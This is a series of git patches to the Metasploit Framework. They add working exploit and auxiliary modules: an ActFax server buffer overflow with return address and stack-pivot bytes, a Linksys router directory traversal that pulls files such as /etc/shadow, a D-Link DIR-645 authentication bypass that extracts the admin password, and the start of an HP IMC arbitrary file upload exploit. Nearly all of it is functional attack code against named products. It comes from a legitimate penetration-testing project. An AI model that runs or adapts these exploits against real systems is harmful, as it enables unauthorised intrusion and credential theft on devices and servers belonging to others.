From fd63283524e0a5dd6d2f543b7326e6fbe6472a8f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 22 Mar 2013 21:46:12 +0100 Subject: [PATCH 01/21] make msftidy happy --- .../windows/misc/actfax_raw_server_bof.rb | 82 +++++++++++++++++++ 1 file changed, 82 insertions(+) create mode 100644 modules/exploits/windows/misc/actfax_raw_server_bof.rb diff --git a/modules/exploits/windows/misc/actfax_raw_server_bof.rb b/modules/exploits/windows/misc/actfax_raw_server_bof.rb new file mode 100644 index 0000000000..f389c74eec --- /dev/null +++ b/modules/exploits/windows/misc/actfax_raw_server_bof.rb @@ -0,0 +1,82 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ActFax 5.01 RAW Server Buffer Overflow', + 'Description' => %q{ + This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW + Server can be used to transfer fax messages without any underlying protocols. To + note significant fields in the fax being transferred, like the fax number or the + recipient, ActFax data fields can be used. This module exploits a buffer overflow + in the handling of the @F506 fields due to the insecure usage of strcpy. This + module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Craig Freyman', # @cd1zz # discovery and Metasploit module + 'corelanc0d3r', # Metasploit module + 'juan vazquez' # Metasploit module cleanup + ], + 'References' => + [ + [ 'OSVDB', '89944' ], + [ 'BID', '57789' ], + [ 'EDB', '24467' ], + [ 'URL', 'http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html' ] + ], + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => (0x00..0x1f).to_a.pack("C*") + "\x40", + 'DisableNops' => true, + 'Space' => 1024, + 'EncoderOptions' => + { + 'BufferRegister' => 'ECX' + } + }, + 'Targets' => + [ + [ 'ActFax 5.01 / Windows XP SP3', + { + 'Ret' => 0x77c35459, # push esp # ret # msvcrt.dll + 'Offset' => 1024 + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Feb 5 2013', + 'DefaultTarget' => 0)) + + end + + def exploit + connect + p = payload.encoded + buffer = p + buffer << rand_text(target['Offset'] - p.length) + buffer << [target.ret].pack("V") + buffer << "\x89\xe1" # mov ecx, esp + buffer << "\x81\xC1\xFC\xFB\xFF\xFF" # add ecx, -1028 + buffer << "\x81\xC4\x6C\xEE\xFF\xFF" # add esp, -4500 + buffer << "\xE9\xE9\xFB\xFF\xFF" # jmp $-1042 + print_status("Trying target #{target.name}...") + sock.put("@F506 "+buffer+"@\r\npwnag3\r\n\r\n") + disconnect + end +end + From 6eaf995642b3fd1670a10998c7d07fac8555a427 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 22 Mar 2013 21:48:02 +0100 Subject: [PATCH 02/21] cleaning exploiting string --- modules/exploits/windows/misc/actfax_raw_server_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/actfax_raw_server_bof.rb b/modules/exploits/windows/misc/actfax_raw_server_bof.rb index f389c74eec..6638f30c7d 100644 --- a/modules/exploits/windows/misc/actfax_raw_server_bof.rb +++ b/modules/exploits/windows/misc/actfax_raw_server_bof.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote buffer << "\x81\xC4\x6C\xEE\xFF\xFF" # add esp, -4500 buffer << "\xE9\xE9\xFB\xFF\xFF" # jmp $-1042 print_status("Trying target #{target.name}...") - sock.put("@F506 "+buffer+"@\r\npwnag3\r\n\r\n") + sock.put("@F506 "+buffer+"@\r\n\r\n") disconnect end end From 89c0e8c27ea9b3421c59da498743e78615874b21 Mon Sep 17 00:00:00 2001 From: Nathan Einwechter Date: Fri, 22 Mar 2013 19:27:02 -0400 Subject: [PATCH 03/21] Fix add_resource call in adobe_flas_mp5_cprt --- modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index 930590bfbb..07022ba8e5 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -176,13 +176,12 @@ class Metasploit3 < Msf::Exploit::Remote # # "/test.mp4" is currently hard-coded in the swf file, so we need to add to resource - # + # proc = Proc.new do |cli, req| + self.add_resource({'Path' => "/test.mp4", 'Proc' => proc}) rescue nil on_request_uri(cli, req) end - self.add_resource({'Path'=>'/test.mp4', 'Proc'=>proc})# rescue nil - end def on_request_uri(cli, request) From 36d1746c0d2b26ff48ed9233f0e0ed361ec64480 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sat, 23 Mar 2013 17:01:02 +0100 Subject: [PATCH 04/21] linksys traversal module - initial commit --- data/wordlists/sensitive_files.txt | 4 +- .../auxiliary/admin/http/linksys_traversal.rb | 132 ++++++++++++++++++ 2 files changed, 135 insertions(+), 1 deletion(-) create mode 100644 modules/auxiliary/admin/http/linksys_traversal.rb diff --git a/data/wordlists/sensitive_files.txt b/data/wordlists/sensitive_files.txt index 5bc6e2a962..79db3e9f44 100755 --- a/data/wordlists/sensitive_files.txt +++ b/data/wordlists/sensitive_files.txt @@ -1,4 +1,5 @@ /etc/passwd +/etc/shadow /etc/groups /etc/mysql.conf /etc/mysql/my.cnf @@ -10,4 +11,5 @@ /etc/motd /etc/fstab /etc/inetd.conf -/etc/xinetd.conf \ No newline at end of file +/etc/xinetd.conf +/proc/version diff --git a/modules/auxiliary/admin/http/linksys_traversal.rb b/modules/auxiliary/admin/http/linksys_traversal.rb new file mode 100644 index 0000000000..8b896303dd --- /dev/null +++ b/modules/auxiliary/admin/http/linksys_traversal.rb @@ -0,0 +1,132 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Linksys Directory Traversal Vulnerability', + 'Version' => '$$', + 'Description' => %q{ + This module exploits a directory traversal vulnerablity which is present in different + Linksys home routers like the E1500. + }, + 'References' => + [ + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ], + [ 'URL', 'http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml' ], + [ 'BID', '57760' ], + [ 'OSVDB', '89911' ], + [ 'EDB', '24475' ], + ], + 'Author' => [ 'm-1-k-3' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line", + File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), + + ], self.class) + end + + def extract_words(wordfile) + return [] unless wordfile && File.readable?(wordfile) + begin + words = File.open(wordfile, "rb") do |f| + f.read + end + rescue + return [] + end + save_array = words.split(/\r?\n/) + return save_array + end + + def find_files(file,user,pass) + uri = "/apply.cgi" + traversal = '../..' + data_trav = "submit_type=wsc_method2&change_action=gozila_cgi&next_page=" << traversal << file + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => uri, + 'authorization' => basic_auth(user,pass), + 'encode_params' => false, + 'vars_post' => { + "submit_type" => "wsc_method2", + "change_action" => "gozila_cgi", + "next_page" => traversal << file + } + }) + #puts res.body.length + #puts res + if (res and res.code == 200 and res.body.length > 10) + print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") + report_web_vuln({ + :host => rhost, + :port => rport, + :vhost => datastore['VHOST'], + :path => uri, + :pname => data_trav, + :risk => 3, + :proof => data_trav, + :name => self.fullname, + :category => "web", + :method => "POST" + }) + + loot = store_loot("lfi.data","text/plain",rhost, res.body,file) + vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") + elsif (res and res.code) + vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}") + end + end + + def run_host(ip) + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + + vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") + + #test login + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + return if res.nil? + return if (res.headers['Server'].nil? or res.headers['Server'] !~ /httpd/) + return if (res.code == 404) + + if [200, 301, 302].include?(res.code) + vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") + else + vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") + return + end + + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return + end + + extract_words(datastore['SENSITIVE_FILES']).each do |file| + find_files(file,user,pass) unless file.empty? + end + end +end From aacd14ae45eca711208b8868a6221be91af94bc7 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sat, 23 Mar 2013 21:31:08 +0100 Subject: [PATCH 05/21] version removed, encode params removed --- modules/auxiliary/admin/http/linksys_traversal.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/http/linksys_traversal.rb b/modules/auxiliary/admin/http/linksys_traversal.rb index 8b896303dd..bffc69d817 100644 --- a/modules/auxiliary/admin/http/linksys_traversal.rb +++ b/modules/auxiliary/admin/http/linksys_traversal.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Linksys Directory Traversal Vulnerability', - 'Version' => '$$', 'Description' => %q{ This module exploits a directory traversal vulnerablity which is present in different Linksys home routers like the E1500. @@ -64,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'POST', 'uri' => uri, 'authorization' => basic_auth(user,pass), - 'encode_params' => false, + #'encode_params' => false, 'vars_post' => { "submit_type" => "wsc_method2", "change_action" => "gozila_cgi", @@ -73,6 +72,7 @@ class Metasploit3 < Msf::Auxiliary }) #puts res.body.length #puts res + #without res.body.length we get lots of false positives if (res and res.code == 200 and res.body.length > 10) print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") report_web_vuln({ From b1ae2f7bf40eb9eada74009b0788aed2a4906801 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sat, 23 Mar 2013 22:29:31 +0100 Subject: [PATCH 06/21] replace module to the scanner directory --- .../auxiliary/admin/http/linksys_traversal.rb | 132 ------------------ 1 file changed, 132 deletions(-) delete mode 100644 modules/auxiliary/admin/http/linksys_traversal.rb diff --git a/modules/auxiliary/admin/http/linksys_traversal.rb b/modules/auxiliary/admin/http/linksys_traversal.rb deleted file mode 100644 index bffc69d817..0000000000 --- a/modules/auxiliary/admin/http/linksys_traversal.rb +++ /dev/null @@ -1,132 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Scanner - - def initialize - super( - 'Name' => 'Linksys Directory Traversal Vulnerability', - 'Description' => %q{ - This module exploits a directory traversal vulnerablity which is present in different - Linksys home routers like the E1500. - }, - 'References' => - [ - [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ], - [ 'URL', 'http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml' ], - [ 'BID', '57760' ], - [ 'OSVDB', '89911' ], - [ 'EDB', '24475' ], - ], - 'Author' => [ 'm-1-k-3' ], - 'License' => MSF_LICENSE - ) - - register_options( - [ - OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line", - File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), - OptString.new('USERNAME',[ true, 'User to login with', 'admin']), - OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), - - ], self.class) - end - - def extract_words(wordfile) - return [] unless wordfile && File.readable?(wordfile) - begin - words = File.open(wordfile, "rb") do |f| - f.read - end - rescue - return [] - end - save_array = words.split(/\r?\n/) - return save_array - end - - def find_files(file,user,pass) - uri = "/apply.cgi" - traversal = '../..' - data_trav = "submit_type=wsc_method2&change_action=gozila_cgi&next_page=" << traversal << file - res = send_request_cgi( - { - 'method' => 'POST', - 'uri' => uri, - 'authorization' => basic_auth(user,pass), - #'encode_params' => false, - 'vars_post' => { - "submit_type" => "wsc_method2", - "change_action" => "gozila_cgi", - "next_page" => traversal << file - } - }) - #puts res.body.length - #puts res - #without res.body.length we get lots of false positives - if (res and res.code == 200 and res.body.length > 10) - print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") - report_web_vuln({ - :host => rhost, - :port => rport, - :vhost => datastore['VHOST'], - :path => uri, - :pname => data_trav, - :risk => 3, - :proof => data_trav, - :name => self.fullname, - :category => "web", - :method => "POST" - }) - - loot = store_loot("lfi.data","text/plain",rhost, res.body,file) - vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") - elsif (res and res.code) - vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}") - end - end - - def run_host(ip) - user = datastore['USERNAME'] - pass = datastore['PASSWORD'] - - vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") - - #test login - begin - res = send_request_cgi({ - 'uri' => '/', - 'method' => 'GET', - 'authorization' => basic_auth(user,pass) - }) - - return if res.nil? - return if (res.headers['Server'].nil? or res.headers['Server'] !~ /httpd/) - return if (res.code == 404) - - if [200, 301, 302].include?(res.code) - vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") - else - vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") - return - end - - rescue ::Rex::ConnectionError - vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") - return - end - - extract_words(datastore['SENSITIVE_FILES']).each do |file| - find_files(file,user,pass) unless file.empty? - end - end -end From bd522a03e36dde3f21a155dbd61606095b562381 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sat, 23 Mar 2013 22:29:44 +0100 Subject: [PATCH 07/21] replace module to the scanner directory --- .../scanner/http/linksys_traversal.rb | 130 ++++++++++++++++++ 1 file changed, 130 insertions(+) create mode 100644 modules/auxiliary/scanner/http/linksys_traversal.rb diff --git a/modules/auxiliary/scanner/http/linksys_traversal.rb b/modules/auxiliary/scanner/http/linksys_traversal.rb new file mode 100644 index 0000000000..c59f1543e1 --- /dev/null +++ b/modules/auxiliary/scanner/http/linksys_traversal.rb @@ -0,0 +1,130 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Linksys Directory Traversal Vulnerability', + 'Description' => %q{ + This module exploits a directory traversal vulnerablity which is present in different + Linksys home routers like the E1500. + }, + 'References' => + [ + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ], + [ 'URL', 'http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml' ], + [ 'BID', '57760' ], + [ 'OSVDB', '89911' ], + [ 'EDB', '24475' ], + ], + 'Author' => [ 'm-1-k-3' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line", + File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), + + ], self.class) + end + + def extract_words(wordfile) + return [] unless wordfile && File.readable?(wordfile) + begin + words = File.open(wordfile, "rb") do |f| + f.read + end + rescue + return [] + end + save_array = words.split(/\r?\n/) + return save_array + end + + def find_files(file,user,pass) + uri = "/apply.cgi" + traversal = '../..' + data_trav = "submit_type=wsc_method2&change_action=gozila_cgi&next_page=" << traversal << file + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => uri, + 'authorization' => basic_auth(user,pass), + 'vars_post' => { + "submit_type" => "wsc_method2", + "change_action" => "gozila_cgi", + "next_page" => traversal << file + } + }) + + #without res.body.length we get lots of false positives + if (res and res.code == 200 and res.body.length > 10) + print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") + report_web_vuln({ + :host => rhost, + :port => rport, + :vhost => datastore['VHOST'], + :path => uri, + :pname => data_trav, + :risk => 3, + :proof => data_trav, + :name => self.fullname, + :category => "web", + :method => "POST" + }) + + loot = store_loot("lfi.data","text/plain",rhost, res.body,file) + vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") + elsif (res and res.code) + vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}") + end + end + + def run_host(ip) + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + + vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") + + #test login + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + return if res.nil? + return if (res.headers['Server'].nil? or res.headers['Server'] !~ /httpd/) + return if (res.code == 404) + + if [200, 301, 302].include?(res.code) + vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") + else + vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") + return + end + + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return + end + + extract_words(datastore['SENSITIVE_FILES']).each do |file| + find_files(file,user,pass) unless file.empty? + end + end +end From 47d458a294e6a7a6693ab827f48e8e12e96f9e6c Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sat, 23 Mar 2013 22:40:32 +0100 Subject: [PATCH 08/21] replacement of the netgear-sph200d module --- .../{admin => scanner}/http/netgear_sph200d_traversal.rb | 1 - 1 file changed, 1 deletion(-) rename modules/auxiliary/{admin => scanner}/http/netgear_sph200d_traversal.rb (99%) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb similarity index 99% rename from modules/auxiliary/admin/http/netgear_sph200d_traversal.rb rename to modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb index 909afe5443..e7131b9306 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary ) register_options( [ - Opt::RPORT(80), OptPath.new('FILELIST', [ true, "File containing sensitive files, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), OptString.new('USERNAME',[ true, 'User to login with', 'admin']), From 7ff9c70e38efdf182371dab47bab1d4db880ed97 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sat, 23 Mar 2013 22:46:26 +0100 Subject: [PATCH 09/21] 10 to 0 is good :) --- modules/auxiliary/scanner/http/linksys_traversal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/linksys_traversal.rb b/modules/auxiliary/scanner/http/linksys_traversal.rb index c59f1543e1..f370dc8a8d 100644 --- a/modules/auxiliary/scanner/http/linksys_traversal.rb +++ b/modules/auxiliary/scanner/http/linksys_traversal.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary }) #without res.body.length we get lots of false positives - if (res and res.code == 200 and res.body.length > 10) + if (res and res.code == 200 and res.body.length > 0) print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") report_web_vuln({ :host => rhost, From 71708c4bc38376343c34547c313b594509468c0c Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sun, 24 Mar 2013 11:44:24 +0100 Subject: [PATCH 10/21] dir 645 password extractor - initial commit --- .../http/dlink_dir_645_password_extractor.rb | 91 +++++++++++++++++++ 1 file changed, 91 insertions(+) create mode 100644 modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb new file mode 100644 index 0000000000..4ac09a6a15 --- /dev/null +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -0,0 +1,91 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'DLink DIR 645 Password Extractor', + 'Description' => %q{ + This module exploits an authentication bypass vulnerability in DIR 645 < v1.03. + With this vulnerability you are able to extract the password for the remote management. + }, + 'References' => + [ + [ 'URL', 'http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt' ], + [ 'BID', '58231' ], + [ 'OSVDB', '90733' ] + ], + 'Author' => [ + 'Michael Messner ', #metasploit module + 'Roberto Paleari ' #vulnerability discovery + ], + 'License' => MSF_LICENSE + ) + end + + def run_host(ip) + + vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device") + + #Curl request: + #curl -d SERVICES=DEVICE.ACCOUNT http://192.168.178.200/getcfg.php | egrep "\ '/getcfg.php', + 'method' => 'POST', + 'headers' => { + 'Content-Type' => 'application/x-www-form-urlencoded', + 'Content-Length' => '23', + }, + 'vars_post' => { + 'SERVICES' => 'DEVICE.ACCOUNT' + } + }) + + return if res.nil? + return if (res.headers['Server'].nil? or res.headers['Server'] !~ /DIR-645 Ver 1.0/) + return if (res.code == 404) + + #proof of response + if res.body =~ /password/ + print_good("#{rhost}:#{rport} - credentials successfully extracted") + vprint_status("#{res.body}") + + #store all details as loot -> there is lots of usefull stuff in the response + loot = store_loot("account_details.txt","text/plain",rhost, res.body) + vprint_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}") + + res.body.each_line do |line| + if line =~ // + line = line.gsub(//,'') + pass = line.gsub(/<\/password>/,'') + vprint_good("pass: #{pass}") + end + if line =~ // + line = line.gsub(//,'') + user = line.gsub(/<\/name>/,'') + vprint_good("user: #{user}") + end + end + end + + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return + end + + + end +end From 9f8ec37060ef683638e16ea57778da7319d7235f Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sun, 24 Mar 2013 11:48:49 +0100 Subject: [PATCH 11/21] store loot --- .../admin/http/dlink_dir_645_password_extractor.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index 4ac09a6a15..acaf2f1451 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -45,10 +45,10 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => '/getcfg.php', 'method' => 'POST', - 'headers' => { - 'Content-Type' => 'application/x-www-form-urlencoded', - 'Content-Length' => '23', - }, + #'headers' => { + # 'Content-Type' => 'application/x-www-form-urlencoded', + # 'Content-Length' => '23', + # }, 'vars_post' => { 'SERVICES' => 'DEVICE.ACCOUNT' } @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary #store all details as loot -> there is lots of usefull stuff in the response loot = store_loot("account_details.txt","text/plain",rhost, res.body) - vprint_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}") + print_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}") res.body.each_line do |line| if line =~ // From d90de54891a23c24b5233bf07e934d01255bfc06 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sun, 24 Mar 2013 15:00:18 +0100 Subject: [PATCH 12/21] reporting and feedback --- .../http/dlink_dir_645_password_extractor.rb | 40 ++++++++++--------- 1 file changed, 22 insertions(+), 18 deletions(-) diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index acaf2f1451..d70ddc1165 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -10,7 +10,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report def initialize super( @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary ) end - def run_host(ip) + def run vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device") @@ -45,10 +45,6 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => '/getcfg.php', 'method' => 'POST', - #'headers' => { - # 'Content-Type' => 'application/x-www-form-urlencoded', - # 'Content-Length' => '23', - # }, 'vars_post' => { 'SERVICES' => 'DEVICE.ACCOUNT' } @@ -58,25 +54,33 @@ class Metasploit3 < Msf::Auxiliary return if (res.headers['Server'].nil? or res.headers['Server'] !~ /DIR-645 Ver 1.0/) return if (res.code == 404) - #proof of response - if res.body =~ /password/ + if res.body =~ /(.*)<\/password>/ print_good("#{rhost}:#{rport} - credentials successfully extracted") - vprint_status("#{res.body}") + #vprint_status("#{res.body}") - #store all details as loot -> there is lots of usefull stuff in the response + #store all details as loot -> there is some usefull stuff in the response loot = store_loot("account_details.txt","text/plain",rhost, res.body) print_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}") res.body.each_line do |line| - if line =~ // - line = line.gsub(//,'') - pass = line.gsub(/<\/password>/,'') - vprint_good("pass: #{pass}") + if line =~ /(.*)<\/name>/ + @user = $1 + next end - if line =~ // - line = line.gsub(//,'') - user = line.gsub(/<\/name>/,'') - vprint_good("user: #{user}") + if line =~ /(.*)<\/password>/ + pass = $1 + vprint_good("user: #{@user}") + vprint_good("pass: #{pass}") + + report_auth_info( + :host => rhost, + :port => rport, + :sname => 'http', + :user => @user, + :pass => pass, + :source_type => "user_supplied", + :active => true + ) end end end From 98ac6e8090627a6b390b026e261423deffe69d00 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sun, 24 Mar 2013 21:01:30 +0100 Subject: [PATCH 13/21] feedback included --- .../auxiliary/admin/http/dlink_dir_645_password_extractor.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index d70ddc1165..0c6c781e36 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -56,7 +56,6 @@ class Metasploit3 < Msf::Auxiliary if res.body =~ /(.*)<\/password>/ print_good("#{rhost}:#{rport} - credentials successfully extracted") - #vprint_status("#{res.body}") #store all details as loot -> there is some usefull stuff in the response loot = store_loot("account_details.txt","text/plain",rhost, res.body) @@ -78,13 +77,11 @@ class Metasploit3 < Msf::Auxiliary :sname => 'http', :user => @user, :pass => pass, - :source_type => "user_supplied", :active => true ) end end end - rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return From 26b43d9ed2465b9707cbfb367ae879d47abf9b7b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 25 Mar 2013 00:54:30 +0100 Subject: [PATCH 14/21] Added module for ZDI-13-050 --- .../windows/http/hp_imc_mibfileupload.rb | 115 ++++++++++++++++++ 1 file changed, 115 insertions(+) create mode 100644 modules/exploits/windows/http/hp_imc_mibfileupload.rb diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb new file mode 100644 index 0000000000..f081025310 --- /dev/null +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -0,0 +1,115 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Intelligent Management Center Arbitrary File Upload', + 'Description' => %q{ + This module exploits a code execution flaw in HP Intelligent Management Center. + The vulnerability exists in the mibFileUpload which is accepting unauthenticated + file uploads and handling zip contents in a insecure way. Combining both weaknesses + a remote attacker can accomplish arbitrary file upload. This module has been tested + successfully on HP Intelligent Management Center 5.1 E0202 on Windows 2003 SP2. + }, + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 